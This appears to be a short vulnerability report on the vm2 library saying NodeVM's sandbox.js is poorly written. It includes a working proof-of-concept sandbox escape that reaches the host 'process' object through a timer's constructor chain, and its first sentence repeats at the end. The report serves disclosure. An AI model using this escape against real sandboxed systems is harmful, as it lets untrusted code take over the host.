NodeVMs sandbox.js is quite poorly written and needs an overhaul since it has at least one breakout:
const {NodeVM} = require('vm2');
const vm = new NodeVM();
console.log(vm.run('('+function() {
exports.process = setTimeout(()=>{}).ref().constructor.constructor('return process')();
}+')()'));
NodeVMs sandbox.js is quite poorly written and needs an overhaul since it has at least one breakout: